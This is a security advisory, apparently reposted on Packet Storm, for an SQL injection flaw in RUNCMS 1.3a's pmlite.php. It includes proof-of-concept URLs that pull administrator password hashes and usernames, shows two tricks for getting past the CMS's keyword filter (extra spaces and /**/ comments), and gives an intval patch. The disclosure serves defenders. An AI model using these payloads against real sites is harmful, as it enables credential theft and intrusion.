RUNCMS version 1.3a is vulnerable to SQL injection due to improper user input sanitization. POC included.
14e347c720be0a14ec4ca360bd0bd757032c17d4c6cd0582b2fb62fc3c809842refrence:
http://www.runcms.org/public/modules/forum/viewtopic.php?topic_id=4003&forum=18
http://hamid.ir/security/
-----------------------------------------------
RUNCMS 1.3a SQL injection
Runcms Includes most things a webmaster would expect
from a cms: downloads, links, tutorials section,
polls, forums, news,
faq, contact form, rss feeds, file uploads, blogging
via xml-rpc, & more. Possibility to manage users as
groups with module/block specific access permissions,
and extend functioality via 3rd party module plug-ins
and ...
Original Author: The Xoops Project
http://www.xoops.org
http://www.runcms.org
Credit:
The information has been provided by Hamid Ebadi
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
tested on RUNCMS 1.3a and RUNCM 1.2 (and below ?)
Detail ::
Send Private Message
The following URL can be used to trigger an SQL
injection vulnerability in the pmlite.php [ but no
error will disply ! ]
http://localhost/modules/messages/pmlite.php?send=1&to_userid=-1[SQL
INJECTION]
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1
union select pass from runcms_users
internal RUNCMS protection will block this request and
redirect your browser to http://localhost/abuse.php
and you will see this warning:
" WARNING !!!!!! You were trying to abuse the
system, a logfile was created ..."
what is the problem ?
Bypassing Protection :
as i underestand RUNCMS just filter (union select)
and (union all select) and ....! but they forgot
(union select) !
exploit:
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
there is another way to bypass runcms internal
protection simply add " /**/ " in your query
exploit will be something like this :
http://localhost/modules/messages/pmlite.php?send=2&to_userid=-1/**/union/**/select/**/uname/**/from/**/runcms_users%20where%20level=5/*hamid-network-security-team-http://hamid.ir
Unofficial Patch:
line 33 : pmlite.php
$to_userid = !empty($_POST['to_userid']) ?
$_POST['to_userid'] : $_GET['to_userid'];
// Hamid Ebadi (hamid Network Security Team): patch
for RUNCMS 1.3a and below .
$to_userid=intval($to_userid); //add this line plz
HAMID
$send = $_POST['send'];
Signature
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed